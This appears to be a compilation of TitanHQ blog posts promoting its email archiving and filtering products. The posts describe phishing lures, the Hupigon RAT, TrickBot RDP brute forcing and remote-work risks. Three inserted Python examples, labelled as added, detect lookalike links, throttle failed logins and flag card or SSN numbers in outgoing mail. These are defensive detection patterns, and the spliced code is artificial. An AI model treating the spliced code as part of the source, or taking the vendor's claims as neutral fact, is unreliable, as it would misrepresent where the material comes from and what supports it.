There are several reasons why a third-party email archiving solution for Office 365 is a wiser choice than using the email archiving function provided by Microsoft. Microsoft Office 365 is a superb productivity suite that combines many useful software programs into one convenient package, but one issue that is often raised is that the email archiving options provided are somewhat basic. Email archiving is available, but the features and capabilities of that service fall well below those of third-party email archiving solutions.
Email archiving is a legal requirement and essential for modern businesses. Email is part of the corporate record and messages must be retained and produced during compliance audits, when there are legal disputes as part of eDiscovery requests, and to help resolve HR issues. The failure to provide emails can prove very costly. Regulatory fines have been issued in cases where important emails have not been retained and legal disputes can be easily lost if an accurate email record is not maintained.
Email archiving is not just a checkbox item that must be implemented for compliance. The email archive will need to be accessed and used, which is where the more comprehensive features of a third-party email archiving solution are required.
Searching for emails in an Office 365 email archive can be a pain. The search function is OK, but the search mechanism is nowhere near as efficient as third-party email archiving solutions such as ArcTitan. One of the main benefits of an email archive is the ability to rapidly search and retrieve emails, so search efficiency is important. The default search limit is 250 results with Office 365, which doesn’t lend itself to large scale searching.
Emails often do not contain the information you need in the message body or headers. Data is often stored in email attachments, and this is an area where Office 365 email archiving comes up short. The advanced search functionality of third-party solutions can greatly reduce the time and effort required to find the emails you need. If you need to find data in email attachments, Microsoft will only search in around 50 attachment types and there are many other types of attachments that may contain the data you need.
There are also issues with licensing. With Office 365, licenses are paid per mailbox so when a user leaves the company you need to maintain the mailbox and its associated archive, which is tied to the life of the mailbox. That means continuing to pay for that user and purchasing an additional license for the replacement employee. Over time, that means the cost of the solution can mount significantly, even if your total number of employees remains the same. If like many businesses you need to retain emails for 7 years, during that time a lot of staff may leave the company. Over time the cost of Office 365 archiving is likely to be far higher than you would pay with a third-party solution.
Importing legacy emails into Office 365 archives can be a painful and long-winded process, and exporting files from the archive can also be problematic. Third-party solutions such as ArcTitan allow you to import legacy emails rapidly and export email data in a wide variety of formats. If you ever decide to change email archiving provider, with ArcTitan this is simple.
ArcTitan supports comprehensive policy-based archiving, including message and attachment de-duplication for faster search and retrieval. You get customizable retention periods and policies for users, email content, and attachments, and lightning-fast search and retrieval, with searches that can interrogate up to 30 million emails a second.
Office 365 is a great email solution, but there are disadvantages that are not found in solutions such as ArcTitan. It is a far better choice to opt for an archiving solution that has been developed by a company that specializes in email archiving, such as TitanHQ. You will get a much more comprehensive range of features that will save you time, effort, and money.
To find out more about ArcTitan, to discover how easy the solution is to configure and use and how much you can save over other solutions, give the TitanHQ team a call today. The team will be happy to schedule a product demonstration to show you the key benefits of the solution.
A phishing campaign that spreads a remote access trojan called Hupigon, a RAT that was first identified in 2010, is targeting higher education institutions in the United States.
The Hupigon RAT has previously been deployed by advanced persistent threat (APT) groups from China, although this campaign is not thought to have been operated by APT groups; instead, the Hupigon RAT has been repurposed by hackers. While many industries have been targeted in the campaign, almost half of the attacks have been conducted on colleges and universities.
The Hupigon RAT allows the operators to install other malware variants, steal passwords, and obtain access to the microphone and webcam. Infection could see the hackers take full control of an infected device.
The campaign uses online dating lures to trick users into installing the Trojan. The emails show two dating profiles of supposed users of the platform, and the recipient is directed to select the one they find the most attractive. When the user makes their choice, they are brought to a website where an executable file is downloaded, which installs the Hupigon RAT.
The choice of lure for the campaign is no doubt influenced by the huge increase in popularity of dating apps during the COVID-19 pandemic. While there are not many actual dates taking place due to lockdown and social distancing measures now in place around the world, the lockdowns have seen many people with a lot of time on their hands. That, coupled with social isolation for many single people, has actually led to a rise in the use of online dating apps, with many users of the apps turning to Zoom and FaceTime to have virtual dates. Many popular dating apps have reported a rise in use during the COVID-19 pandemic. For instance, Tinder reports use has grown, with the platform having its busiest ever day, with over 3 billion profiles swiped in just one day.
As we have already seen with COVID-19 lures in phishing attacks, which account for most lures during the pandemic, when there is interest in a particular event or news story, hackers will take advantage. With the popularity of dating apps surging, we can expect to see a rise in the number of online dating-themed lures.
The advice for higher education institutions and companies is to ensure that an advanced spam filtering solution is in place to block the malicious messages and ensure they do not land in end users’ inboxes. It is also crucial to ensure that security awareness training is still being conducted for staff, students, and remote employees to teach them how to spot the signs of phishing and other email threats.
TitanHQ can be of assistance. If you wish to better protect staff, students, and employees and keep inboxes free of threats, give the TitanHQ team a call as soon as you can. After registering, you can be protecting your inboxes in no time.
In this post we will explain some of the important benefits of an email archiving service. If you are not currently archiving your email, we will explain how a small investment can actually save you a lot of money in the long run.
One of the most important reasons for setting up an email archive is to reduce the cost of long-term email storage. By sending a copy of your emails to an archive, you can significantly reduce mail server management costs. Businesses that use ArcTitan for email storage typically save up to 75% in email storage space, eliminate the need for mailbox limits, and significantly improve the performance of their mail servers. All emails sent and received by employees are automatically sent to the archive, which means emails will never be lost or accidentally deleted.
All businesses need to comply with regulations concerning data storage and an email archive will help to ensure compliance. Even if you are not in a regulated industry, it is still important to retain emails for legal purposes. An email archive is a tamperproof repository for all emails. In the event of a regulatory audit, eDiscovery request, or a customer dispute, you will be able to quickly find all relevant emails. It has been estimated that around 80% of U.S. companies are currently engaged in legal action. Email is part of the corporate record and emails must be produced in the event of legal action. You will also need to recover emails in any HR disputes. Email backups serve their purpose, but an email archive will ensure that all email can be recovered if disaster strikes, without any fear of data corruption.
One of the most important benefits of an email archiving service is fast message retrieval. If you need to recover emails from a backup, it could take days or even weeks to find the messages you need, as backups are not searchable. All emails sent to an archive are indexed, which means the archive can be searched and emails can be found and recovered in seconds, regardless of how many emails are in the archive and how long ago a message was sent.
With emails stored in a cloud archive, you will always have access to emails no matter where you are located. You can simply log in to your archive using a web-based interface that can be accessed on any internet-enabled device.
Creating an Email Archiving Policy
When you are creating your email archiving policy, there are two main approaches to take. The first is to set your policy for what types of emails need to be sent to the archive and then to leave it to your employees to follow that policy and archive all emails that need to be stored. The other option is to automate the process. While the first option will reduce the amount of storage space you need, it is a risky strategy. If an email that must be retained is not sent to the archive, the mistake could prove very costly if you are audited or receive an eDiscovery request and you cannot produce the email. The Financial Industry Regulatory Authority (FINRA) fined Scottrade $2.6 million in 2015 for failing to retain certain categories of outgoing emails.
The best approach to take is to set an email archiving policy and to automate the process. This will ensure that come what may, you will always be able to recover emails on demand. This option will require more storage space, but with ArcTitan, space is kept to a minimum. ArcTitan uses deduplication, which involves only storing one copy of a message. If you send an email to a distribution group internally, there is no need to store every copy of that message. ArcTitan will only store one copy of every unique message and all messages are compressed to further reduce storage space.
Whenever an email needs to be retrieved, ArcTitan performs lightning fast searches, and even allows you to quickly search inside common attachment types. Your employees can even access their archived emails through their mail client – Outlook for instance – which means they will not need to trouble your IT department when they accidentally delete an email from their inbox. A search can be performed, and the email can be retrieved instantly on demand.
Discover Why so Many Businesses are Using ArcTitan
TitanHQ has developed ArcTitan to make archiving emails an effortless process. ArcTitan works seamlessly with almost all corporate mail systems and ensures that all emails are stored securely in the cloud where they can be accessed on demand in seconds.
ArcTitan supports comprehensive policy-based archiving to ensure that you only store the emails that must be retained, and policies can be set to ensure that emails are securely deleted automatically at the end of the email retention period. ArcTitan gives you maximum flexibility and control, world class security, enterprise-grade resilience, and lightning fast retrieval of messages when you need them. Users benefit from an intuitive user interface and a significant range of features that are not present in the archiving offerings in Exchange and Office 365.
To find out more about ArcTitan and to schedule a product demonstration, give the TitanHQ team a call today and find out the difference ArcTitan can make to your business.
The lockdown put in place as a result of COVID-19 has forced employees to leave the office and work from home, with contact taking place over communications solutions such as Skype, Slack, and Zoom. Unsurprisingly the huge increase in use of these platforms has led to an opportunity for cybercriminals, who are using fake alerts from these and other communication and teleconferencing platforms as lures in phishing campaigns on remote workers.
Many campaigns have been discovered that take advantage of the popularity of these platforms. One campaign has recently been discovered that uses Skype branding and advises users that they have pending alerts. The emails are personalized, include the Skype username, and feature a review button for users to click to review their alerts. These emails look very much like the actual emails sent to users by Skype. The emails also appear, at first glance, to have been sent from an authentic email address.
The link given in the email takes the recipient to an HTTPS website that has Skype in the domain name. Since the connection between the browser and the website is encrypted, the browser will show the green padlock to indicate that the connection is safe, as is the case on the genuine Skype domain. The webpage includes Skype branding and the logo of the company being targeted and says that the webpage has been set up for authorized use by employees of the business. The username of the victim is automatically added to the login page, so all that is needed is for a password to be entered.
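The padlock only shows that the connection is encrypted, so a link has to be judged by who controls the hostname. The following added example (not part of the original article) triages links for the brand-in-hostname pattern described here and in the Zoom campaign below; the allow-list and all sample URLs are constructed assumptions.

```python
from urllib.parse import urlsplit

# Assumed allow-list: domains an organization has itself verified for each brand.
OFFICIAL_DOMAINS = {
    "skype": {"skype.com"},
    "zoom": {"zoom.us"},
}

# Constructed sample links; none are taken from the campaigns described above.
SAMPLE_LINKS = [
    "https://login.skype.com/login",
    "https://skype-alerts.example.net/review?user=jdoe",
    "https://skype.com.account-check.example.org/",
    "https://skype.com@portal.example.com/",
    "https://zoom.us/j/0000000000",
    "https://zoom-hr-meeting.example.com/signin",
    "https://www.example.org/news",
]


def is_under(host, domain):
    # Exact match or a true subdomain. The leading dot stops a host such as
    # "notskype.com" from being treated as part of "skype.com".
    return host == domain or host.endswith("." + domain)


def classify_link(url):
    """Return a verdict for one URL: official, lookalike or unrelated."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".").lower()
    authority = parts.netloc.lower()  # also contains any "user@" prefix
    uses_https = parts.scheme == "https"  # reported, but never used as evidence of trust

    # The host the browser actually connects to decides whether a link is official.
    for brand, domains in OFFICIAL_DOMAINS.items():
        if any(is_under(host, d) for d in domains):
            return {"verdict": "official", "brand": brand, "https": uses_https}

    # A brand name anywhere in the authority of a non-official host is the lure pattern.
    for brand in OFFICIAL_DOMAINS:
        if brand in authority:
            return {"verdict": "lookalike", "brand": brand, "https": uses_https}

    return {"verdict": "unrelated", "brand": None, "https": uses_https}


def lookalikes(urls):
    """Return the URLs that mention a brand but are not hosted on its domains."""
    return [u for u in urls if classify_link(u)["verdict"] == "lookalike"]


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(classify_link(link)["verdict"].ljust(10), link)
```

Substring matching will also flag unrelated hosts that happen to contain a brand name, so the output is a triage signal for review rather than a block list.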
This campaign was first noticed by Cofense, which received many reports from business users about the emails, which bypassed Microsoft Exchange Online Protection (EOP) and were delivered to Office 365 inboxes.
A Zoom campaign has also been discovered that uses similar tactics. Zoom is one of the most popular lockdown teleconferencing apps and has been recommended by many companies for use by employees to maintain contact during the lockdown. The platform has also been very popular with consumers and now has more than 300 million users.
In this campaign, Zoom meeting alerts are sent to targets. As is common with phishing campaigns, the hackers generate fear and urgency to get the targets to respond quickly without reviewing the messages. This campaign advises the recipients to log in to a meeting with their HR department in relation to their job termination. Clicking the link will similarly bring users to a fake login page where they must enter their credentials. The landing page is a virtual carbon copy of the official Zoom login page, although the only parts of the page that work are the username and password fields. This campaign was discovered by Abnormal Security, which reports that around 50,000 of these messages were sent to Office 365 accounts and bypassed EOP.
The phishing emails are believable, the webpages that users are brought to look genuine, and many people will be tricked by the emails. Security awareness training will help to train employees to question emails such as these, but given the number of messages that are bypassing Microsoft’s EOP, businesses should also think about adding an additional layer of email security to their Office 365 accounts.
This is an area where TitanHQ can be of assistance. SpamTitan Cloud does not replace EOP for Office 365; it allows businesses to add an extra layer on top to provide extra protection from zero-day attacks. SpamTitan Cloud blocks spam, phishing, and malware-laced emails that would otherwise be delivered to Office 365 inboxes.
SpamTitan Cloud is quick and simple to set up and you can safeguard your Office 365 accounts very quickly. Since the solution is available on a free trial, you will be able to consider the difference it makes and see how many malicious messages it blocks before committing to buying it.
To find out more about improving your phishing defenses, give the TitanHQ team a call now.
Are you worried about the cybersecurity risks associated with a largely at-home workforce? Want to find out how you can improve protection for your remote workers and block malware, ransomware and phishing attacks?
On Thursday May 21, 2020 TitanHQ is hosting a webinar to explain how you can easily double protection for your remote workers. This webinar is ideal for current SpamTitan customers, prospective customers, Managed Service Providers and small- to medium-sized enterprises.
During the webinar you’ll find out why it is so important to protect against both the email- and web-based components of cyberattacks and you will discover more about an important layer that can be added to cybersecurity defenses that is often lacking at many SMBs and small- to medium-sized enterprises.
During the webinar TitanHQ will discuss how cybercriminals are exploiting COVID-19 to conduct cyberattacks and how you can better protect the remote workers that are being targeted by cyber actors. You will also discover the WebTitan features and security layers for managing user security at multiple locations with a deep dive into the features and benefits of the latest version of WebTitan Security.
Most cyberattacks have an email and web-based component – Find out how WebTitan serves as a vital layer of security to block phishing attacks, malware and ransomware downloads.
Learn why WebTitan is the leading web security option for Managed Service Providers who service the SMB and SME market.
Join TitanHQ for the webinar, which will be attended by:
Derek Higgins, Engineering Manager TitanHQ
Eddie Monaghan, Channel Manager TitanHQ
Marc Ludden, Strategic Alliance Manager TitanHQ
Kevin Hall, Senior Systems Engineer at Datapac
Title: Keeping your Remote Workers TWICE as secure with SpamTitan & WebTitan
UK think tank Parliament Street has produced a report that reveals the extent to which universities are being targeted by hackers and the sheer amount of spam and malicious emails that are sent to the inboxes of university staff and students.
Data on malicious and spam email volumes was obtained by Parliament Street through a Freedom of Information request. The analysis of data from UK universities showed they are having to block millions of spam emails, hundreds of thousands of phishing emails, and tens of thousands of malware-laced emails every year.
Warwick University’s figures indicate that over 7.6 million spam emails were sent to the email accounts of staff and students in the last quarter of 2019 alone, which included 404,000 phishing emails and more than 10,000 emails including malware.
Bristol University encountered a similar level of targeting, with more than 7 million spam emails over the same period, 76,300 of which included malware. Data from the London School of Hygiene and Tropical Medicine showed that more than 6.3 million spam emails were registered during 2019, which included almost 99,000 phishing emails and over 73,500 malware attacks. 12,773,735 spam and malicious emails were received in total for 2018 and 2019.
Data from Lancaster University showed that over 57 million emails were rejected for reasons such as spam, malware, or phishing, with 1 million emails marked as possible spam. The figures from Imperial College London were also worrisome, with almost 40 million emails intercepted during 2019.
Like attacks on firms, cyberattacks on universities are often conducted for financial profit. These attacks attempt to deliver malware and obtain credentials to gain access to university networks and exfiltrate data to sell on the black market. Universities store huge amounts of sensitive student data, which is extremely valuable to hackers as it can be leveraged for identity theft and other types of fraud. Attacks are also conducted to deliver ransomware to extort money from universities.
Universities normally have high bandwidth to support tens of thousands of students and employees. Attacks are conducted to hijack devices and add them to botnets to conduct a range of cyberattacks on other targets. Email accounts are being hijacked and used to run spear phishing attacks on other targets.
Nation state-backed advanced persistent threat (APT) groups are focusing on universities to gain access to intellectual property and research data. Universities carry out cutting edge research and that information is extremely valuable to companies who can use the research data to develop products to gain a massive competitive advantage.
Universities are viewed as relatively soft targets compared to organizations of a similar size. Cybersecurity defenses tend to be far less advanced, and the large networks and number of devices used by staff and students make defending networks complicated.
With the number of cyberattacks on universities increasing, leaders of higher education institutions need to implement measures to enhance cybersecurity and prevent the attacks from succeeding.
The majority of threats are sent over email, so advanced email security defenses are essential, and that is an area where TitanHQ can be of assistance.
Independent tests confirm that SpamTitan blocks in excess of 99.97% of spam email, helping to keep inboxes free of junk email. SpamTitan uses dual anti-virus engines to block known threats, machine learning to spot new types of phishing attacks, and sandboxing to discover and block zero-day malware and ransomware threats. When email attachments get past initial tests, suspicious attachments are moved to the sandbox for in depth analysis to identify command and control center callbacks and other malicious actions. SpamTitan also uses SPF and DMARC controls to prevent email impersonation attacks, data loss prevention controls for outbound messages and controls to discover potential email account compromises.
If you wish to enhance cybersecurity defenses, begin by upgrading your email security defenses with SpamTitan. You may be shocked to learn how little investment is required to significantly enhance your email security defenses. To discover more, get in touch with TitanHQ now.
The TrickBot Trojan is a complex banking Trojan that was first identified in 2016. While the malware was first just an information stealer dedicated to stealing online banking credentials, the malware has evolved massively over the past four years and several modules have been added that provide a host of other malicious capabilities.
The TrickBot Trojan’s information stealing capabilities have been greatly enhanced. In addition to banking credentials, it will steal system and network data, email credentials, tax data, and intellectual property. TrickBot is capable of moving laterally and silently infecting other computers on the network using authentic Windows utilities and the EternalRomance exploit for the SMBv1 vulnerability. The malware can place a backdoor for persistent access. TrickBot also acts as a malware installer and will download other malicious payloads, such as Ryuk ransomware.
The Trojan is often updated and new variants are regularly made available. The Command and Control infrastructure is also constantly changing. According to a review by Bitdefender, more than 100 new IPs are added to its C&C infrastructure each month with each having a lifespan of around 16 days. The malware and its infrastructure are highly complex, and while steps have been taken to dismantle the operation, the hackers are managing to stay one step ahead.
TrickBot is primarily distributed via spam email through the Emotet botnet. Infection with Emotet sees TrickBot downloaded, and infection with TrickBot sees a computer added to the Emotet botnet. Once all useful data has been obtained from an infected system, the baton is passed over to the Ryuk ransomware operators, with a reverse shell opened giving the Ryuk ransomware operators access to the network.
A recent review of a variant captured by Bitdefender on January 30, 2020 has shown that another method of distribution has been added to its arsenal. The Trojan now has a module for brute forcing RDP. The brute force RDP attacks are mainly being carried out on organizations in the financial services, education, and telecom industries and are currently targeted at organizations in the United States and Hong Kong, although it is likely that the attacks will spread region-by-region over the coming weeks. The attacks are being conducted to steal intellectual property and financial data.
Since the TrickBot Trojan is modular, it can always be updated with new features. The evolution of the malware so far, and its success, mean it will go on being a threat for some time to come. Thankfully, it is possible to prevent infections by practicing good cyber hygiene.
Spam is still the main method of delivery for both the Emotet Trojan and TrickBot so an advanced spam filter is vital. Since new variants are constantly being made available, signature-based detection methods alone are not enough. SpamTitan incorporates a Bitdefender-powered sandbox to analyze suspicious email attachments for malicious activity. This ensures the malicious activity of completely new malware variants is identified and the emails are quarantined before they can cause any damage.
If you don’t require RDP, ensure it is turned off. If you do, ensure access is restricted and strong passwords are set. Use rate limiting to block login attempts after a set number of failures and ensure multifactor authentication is implemented to prevent stolen credentials from being used.
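The rate limiting step can be pictured as a per-source sliding window that refuses further attempts once a threshold of failures is reached. This is an added example, not code from the article or any product it mentions; the thresholds, the log format, and the sample events are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events: timestamp, source IP, account, authentication result.
SAMPLE_EVENTS = """\
2020-03-18T09:00:00 198.51.100.7 jsmith FAIL
2020-03-18T09:00:01 203.0.113.50 administrator FAIL
2020-03-18T09:00:02 203.0.113.50 administrator FAIL
2020-03-18T09:00:03 203.0.113.50 admin FAIL
2020-03-18T09:00:04 203.0.113.50 admin FAIL
2020-03-18T09:00:05 203.0.113.50 backup FAIL
2020-03-18T09:00:06 203.0.113.50 backup OK
2020-03-18T09:00:20 198.51.100.7 jsmith FAIL
2020-03-18T09:00:40 198.51.100.7 jsmith OK
2020-03-18T09:20:00 203.0.113.50 backup FAIL
"""


class LoginThrottle:
    """Block a source after max_failures failed logins inside a sliding window."""

    def __init__(self, max_failures=5, window=timedelta(seconds=60),
                 block_for=timedelta(minutes=15)):
        # Assumed policy values; the article only says "a set number of failures".
        self.max_failures = max_failures
        self.window = window
        self.block_for = block_for
        self._failures = defaultdict(deque)   # source IP -> recent failure times
        self._blocked_until = {}              # source IP -> end of block

    def observe(self, ts, source_ip, success):
        until = self._blocked_until.get(source_ip)
        if until is not None and ts < until:
            # Refused before credentials are checked, so a correct guess made
            # during the block does not get in.
            return "rejected"
        if success:
            # Failures are deliberately not reset on success; they age out of
            # the window instead.
            return "allowed"
        recent = self._failures[source_ip]
        recent.append(ts)
        while recent and ts - recent[0] > self.window:
            recent.popleft()
        if len(recent) >= self.max_failures:
            self._blocked_until[source_ip] = ts + self.block_for
            recent.clear()
            return "blocked"
        return "failed"


def replay(log_text, throttle):
    """Feed log lines through the throttle; return (ip, account, verdict) tuples."""
    verdicts = []
    for line in log_text.strip().splitlines():
        ts_text, ip, account, result = line.split()
        ts = datetime.fromisoformat(ts_text)
        verdicts.append((ip, account, throttle.observe(ts, ip, result == "OK")))
    return verdicts


def blocked_sources(verdicts):
    """Source IPs that hit the failure threshold at least once."""
    return {ip for ip, _, verdict in verdicts if verdict == "blocked"}


if __name__ == "__main__":
    for ip, account, verdict in replay(SAMPLE_EVENTS, LoginThrottle()):
        print(f"{ip:15} {account:14} {verdict}")
```

In the sample, the sixth attempt from 203.0.113.50 carries a valid password but is still refused because the source is blocked, while the user who mistypes twice is unaffected.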
For additional details on SpamTitan Email Security and to find out how you can enhance your defenses against email and web-based attacks, contact the TitanHQ team now.
The 2019 Novel Coronavirus pandemic has meant that many workers have had to self-isolate at home and an increasing number of employees wish to work from home to reduce risk of contracting COVID-19. Companies are under pressure to allow their workers to stay at home and use either company-issued or personal devices to log onto their networks and work remotely.
Cybercriminals are always changing their tactics, techniques, and procedures and they have jumped at the opportunity served up by the Novel Coronavirus. People are wary and rightly so. COVID-19 has a high mortality rate and the virus is spreading rapidly. People want information about cases in their local district, advice on how to safeguard themselves, and information about possible cures. Hackers have obliged and are conducting phishing campaigns that claim to offer all that information. Many campaigns have now been discovered from many different threat groups that attempt to obtain login credentials and spread malware. Since the start of January when the first major campaigns were detected, the volume of coronavirus and COVID-19 emails has increased significantly.
Campaigns are being run that impersonate governmental and non-governmental authorities on the Novel Coronavirus and COVID-19, such as the World Health Organization (WHO), the U.S. Centers for Disease Control and Prevention (CDC), the U.S. Department of Health and Human Services, and other government agencies. COVID-19-themed emails are being sent to remote workers that spoof HR departments warning about cases that have been detected within the organization. Health insurers are being spoofed in campaigns that include invoices for information on COVID-19.
Since January, in excess of 16,000 Coronavirus and COVID-19-themed domains have been registered which are being used to host phishing kits and distribute malware. Experts at CheckPoint Software report that those domains are 50% more likely to be malicious than other domains registered in the same period.
Email security and home working will naturally be a major worry for IT teams given the sheer number of home workers due to the Coronavirus pandemic and the volume of attacks that are now being conducted on home workers. With so many devices now connecting to networks remotely, if cybercriminals do obtain credentials, it will be much more difficult for IT teams to identify threat actors connecting remotely. Luckily, there are steps that can be taken to improve email security, and home working need not significantly increase risk.
You should see to it that your employees can only connect to your network and cloud-based services through a VPN. Enterprise VPNs can be set up to force all traffic through the VPN to reduce the potential for mistakes. Make sure that the VPN is set up to start automatically when the device is turned on.
It is vital that all remote workers are protected by a strong and effective email security solution. It is not possible to stop hackers targeting remote workers, but it is possible to prevent phishing and malware threats from reaching inboxes.
To safeguard your employees against phishing attacks and malware, an advanced email security solution is vital. If you use Office 365 for email, do not rely on Office 365 email security. You will need greater protection than Exchange Online Protection provides to safeguard against phishing, spear phishing, and zero-day threats.
SpamTitan has a number of different detection mechanisms to identify and block the full range of email threats. SpamTitan incorporates SPF and DMARC to put in place protection against email impersonation attacks, machine learning algorithms and predictive technology to safeguard from zero-day attacks, advanced phishing protection from whaling and spear phishing attacks by scanning inbound email in real-time, dual antivirus engines to prevent malware threats, and sandboxing for in depth analysis of suspicious attachments. SpamTitan also incorporates 6 specialist RBLs, supports whitelisting, blacklisting, and greylisting, and uses multiple threat intelligence feeds.
There is a higher risk of insider threats with remote workers. To provide protection and to prevent accidental policy breaches, SpamTitan has a data loss prevention filter to stop credit card numbers, Social Security numbers, and other data types from being sent over email.
No email security solution can 100% prevent all email threats from infiltrating your inbox, 100% of the time. It is therefore important to provide regular cybersecurity training to employees to make them aware of phishing threats, train them how to identify a phishing email or social engineering scam, and condition remote employees how to react should a threat be received. Phishing simulation exercises are also helpful to see which employees require additional training and to identify possible gaps in training programs. IT security basic training refreshers should also be given to ensure employees know what can and cannot be done with work devices.
Multi-factor authentication must be put in place on all applications and email accounts to add security in the event of an account compromise. If credentials are stolen and used from a previously unknown location or an unfamiliar device, a second authentication factor must be given before access is granted. You should also turn off macros on all user devices, unless a specific user needs to use macros for work reasons.
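To show what an outbound data loss prevention check of this kind involves, the following added example scans a message body for payment card numbers (validated with the Luhn checksum) and structurally valid Social Security numbers. It is not SpamTitan's filter; the patterns, function names, and the sample message are constructed assumptions.

```python
import re

# 13 to 19 digits, optionally separated by single spaces or hyphens.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
SSN_RE = re.compile(r"\b(\d{3})-(\d{2})-(\d{4})\b")

# Constructed sample message; the card number is a widely used test value.
SAMPLE_MESSAGE = """\
Hi, please charge the card 4111 1111 1111 1111 exp 04/23.
Employee SSN is 123-45-6789. Ticket ref 4111 1111 1111 1112, tracking 000-12-3456.
"""


def luhn_ok(digits):
    """Luhn checksum: double every second digit from the right, sum, mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def ssn_plausible(area, group, serial):
    """Reject values that are never issued: area 000, 666 or 900-999,
    group 00, serial 0000."""
    if area in ("000", "666") or area.startswith("9"):
        return False
    return group != "00" and serial != "0000"


def scan_outbound(text):
    """Return (type, masked value) findings; full values are never returned,
    so the findings can be logged safely."""
    findings = []
    for match in CARD_RE.finditer(text):
        digits = re.sub(r"\D", "", match.group())
        # The checksum removes most digit runs that merely look like a card
        # number (order references, tracking numbers and so on).
        if luhn_ok(digits):
            findings.append(("credit_card", "*" * (len(digits) - 4) + digits[-4:]))
    for match in SSN_RE.finditer(text):
        area, group, serial = match.groups()
        if ssn_plausible(area, group, serial):
            findings.append(("ssn", "***-**-" + serial))
    return findings


def should_block(text):
    """Policy decision for an outbound message: hold it if anything was found."""
    return bool(scan_outbound(text))


if __name__ == "__main__":
    for kind, masked in scan_outbound(SAMPLE_MESSAGE):
        print(kind, masked)
    print("block:", should_block(SAMPLE_MESSAGE))
```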
To discover more about how you can enhance email security for remote workers, give the TitanHQ team a call now. You can set up a demonstration to see SpamTitan in action and you can also register for a free trial to put SpamTitan to the test on your own network.
Blackpoint Cyber has unveiled its Remote Reality LIVE conference, which will take place over the Internet from April 8-9th.
The conference will provide insights for managed service providers (MSPs) on how they can stay secure, profitable, and resilient as the world increases remote operations during the COVID-19 pandemic – registration and attendance are free of charge. The two-day conference will include sessions by former leaders of the United States’ government cyber security and intelligence communities along with cyber security experts and business veterans from the MSP services and technology sector.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations expert, says of the conference’s objective: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint is working with leading technology, service, and marketing firms for the conference, including:
Datto: leading global supplier of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Companies
ID Agent: Dark Web and Identity Theft Protection
TitanHQ: Email and DNS Security
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Premier Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director of the CIA, is giving the keynote session on the national security implications of the Coronavirus Pandemic. While he worked at the CIA, Mr. Morell was President George W. Bush’s daily intelligence briefer during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Other expert speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, retired Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and previous commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP sector leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and more.
Matt Solomon, VP of Business Development & IT at ID Agent, said: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
Along with learning how to stay safe and prosper, conference attendees will also be eligible for giveaways and prizes.
The importance of security awareness for remote workers has been further emphasised of late, as there have never been more people working from home than there are now during the COVID-19 pandemic.
Sadly, remote workers are now being actively targeted by hackers who see them as providing an easy way to obtain access to their corporate networks to steal sensitive data, and install malware and ransomware.
Companies may have already given their staff security awareness training to make sure they are made aware of the risks that they are likely to come across and to teach them how to recognize threats and respond. However, working from home introduces many more risks and those risks may not have been covered in security awareness training sessions designed for protecting office workers. It is also important to conduct training regularly and to reinforce that training. This is especially important for remote workers, as risk grows when employees are working remotely.
Better Security Awareness for Remote Workers Necessary as COVID-19 Crisis Worsens
Naturally, as an email security solution provider, we strongly advise the use of a strong email security solution and layered technical defenses to safeguard against phishing, but technical measures, while effective, will not stop all threats from reaching inboxes. It is all too simple to place too much reliance on technical security solutions for safeguarding email environments and work computers. The truth is that even with the best possible email security defenses configured, some threats will end up reaching inboxes.
The importance of providing security awareness training to the workforce and the benefits of doing so have been highlighted by many studies. One benchmarking study, conducted by the security awareness training provider KnowBe4, showed that 37.9% of employees are tricked by phishing tests if they are not provided with security awareness and social engineering training. That figure has grown by 8.3% from the previous year. With security awareness training and phishing email simulations, the figure fell to 14.1% after 90 days.
During the COVID-19 pandemic, the amount of phishing emails being sent has grown significantly and campaigns are being conducted targeting remote workers. The focus of the phishing campaigns is to obtain login credentials to email accounts, VPNs, and SaaS platforms and to distribute malware and ransomware.
With so many staff now working from home, the speed at which firms have had to transition from a largely office-based workforce to having virtually everyone working from home may have resulted in security awareness training for remote workers being put on the long finger. However, with the lockdown likely to go on for several months and attacks on the rise, it is important to make sure that training is conducted, and as soon as possible.
More COVID-19 Domain Registrations and Rise in Web-Based Attacks
Security awareness training for remote workers should also incorporate internet security, as not all threats will arrive in inboxes. Most phishing attacks have a web-based component, and malicious websites are being created for drive-by malware downloads. At present, the vast majority of threats are using COVID-19 and the Novel Coronavirus as bait to get remote workers to install malware, ransomware, or part with their login credentials.
Unsurprisingly, hackers have increased web-based attacks, which are being conducted using a plethora of COVID-19 and Novel-Coronavirus themed domains. By the end of March, around 42,000 domains related to COVID-19 and coronavirus had been set up. A review by Check Point Research showed those domains were 50% more likely to be malicious than other domains registered over the same period of time.
It is important to increase awareness of the dangers of using corporate laptops for personal use such as browsing the Internet. Steps should also be taken to restrict the websites that can be accessed by employees and, at the very least, a solution should be implemented and configured to prevent access to known malicious websites that are used for phishing, fraud, and malware distribution.
Shadow IT is a Major Security Danger
